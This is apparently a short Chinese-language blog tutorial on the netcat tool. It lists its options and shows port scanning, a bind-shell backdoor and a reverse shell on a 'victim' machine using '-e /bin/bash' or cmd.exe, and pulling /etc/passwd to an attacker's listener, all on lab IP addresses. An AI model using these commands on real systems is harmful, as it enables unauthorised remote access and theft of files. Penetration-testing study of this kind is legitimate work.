nc工具学习

0x00、命令详解

基本使用

想要连接到某处:nc  [-options] ip port

绑定端口等待连接:nc -l -p port ip

参数:

-e prog 程序重定向,一旦连接,就执行 [危险!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, …
-h 帮助信息
-i secs 延时的间隔
-l 监听模式,用于入站连接
-n 指定数字的IP地址,不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 任意指定本地及远程端口
-s addr 本地源地址
-u UDP模式
-v 详细输出——用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉——用于扫描时

 

0x01、常用的用法

1、端口扫描:

nc -vv ip port

例:nc -vv 192.168.1.1 5000 扫描192.168.1.1的tcp 5000端口

nc -vv -w secs ip port-port

例:nc -vv -w 5 192.168.1.1 5000-5002 扫描192.168.1.1的5000-5002端口,网络超时的时间设为5秒。

2、开设后门:

受害机:
nc -l -p port -e cmd.exe    //windows
nc -l -p port -e /bin/bash   //linux

攻击机
nc ip port

例:受害机IP:192.168.190.129、攻击机IP:192.168.190.130

受害机先开启后门,等待连接

攻击机进行连接

成功获得shell

 

3、反向连接

受害机:
nc -e cmd.exe ip port      //windows
nc -e /bin/bash ip port    //linux
攻击机:
nc -vv -l -p port

例:受害机IP:192.168.190.129、攻击机IP:192.168.190.130

攻击机先开启一个监听端口,等待受害机反向连接过来

受害机反向连接攻击机

成功获取shell

 

 4、传输文件

从受害机上拉文件下来
受害机:
nc attack_ip port < /etc/passwd
攻击机:
nc -l -p port > tmp

从攻击机上下载文件:
攻击机:
nc -l -p port < tmp
受害机:
nc attack_ip port > tmp

 

posted @ 2018-08-05 16:04  ESHLkangi  阅读(356)  评论(0编辑  收藏  举报